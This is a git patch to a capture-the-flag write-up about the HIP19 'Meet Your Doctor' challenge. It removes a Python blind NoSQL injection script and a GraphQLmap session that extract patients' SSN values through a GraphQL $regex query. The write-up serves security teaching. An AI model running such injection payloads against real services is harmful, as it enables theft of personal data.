From 2d816cd5c9bc04b04f58c45d8052c9529411eeed Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sat, 22 Jun 2019 15:15:33 +0200
Subject: [PATCH] Fix Part 1 - HIP

---
 _posts/2019-6-22-HIP19-MeetYourDoctor.md | 28 ------------------------
 1 file changed, 28 deletions(-)

diff --git a/_posts/2019-6-22-HIP19-MeetYourDoctor.md b/_posts/2019-6-22-HIP19-MeetYourDoctor.md
index 453052e..46949c8 100755
--- a/_posts/2019-6-22-HIP19-MeetYourDoctor.md
+++ b/_posts/2019-6-22-HIP19-MeetYourDoctor.md
@@ -169,31 +169,3 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex
 {% endhighlight %}
 
 Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.
-
-{% highlight python %}
-def blind_nosql(URL):
- data = ""
- data_size = 35
- charset = "0123456789abcdef-"
- while len(data) != data_size:
- for c in charset:
- query ="{doctors(options:%20%22{\%22\%22patients.ssn\%22:1}%22,%20search:%20%22{%20\%22patients.ssn\%22:%20{%20\%22$regex\%22:%20\%22^PLACEHOLDER\%22},%20\%22lastName\%22:\%22Admin\%22%20,%20\%22firstName\%22:\%22Admin\%22%20}%22){id, firstName}}"
- injected = (URL.format(query)).replace("PLACEHOLDER", data + c)
- r = requests.get(injected)
- if r.json()['data']['doctors'] != []:
- data += c
- print("\033[92m[+] Data found:\033[0m {}".format(data))
-{% endhighlight %}
-
-At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output.
-
-
-{% highlight json %}
-GraphQLmap > nosqli
-Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
-Check > 5d089c51dcab2d0032fdd08d
-[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
-{% endhighlight %}
-
-I hope you enjoyed the challenges as I did !
-Feel free to share the blog post ! :)
\ No newline at end of file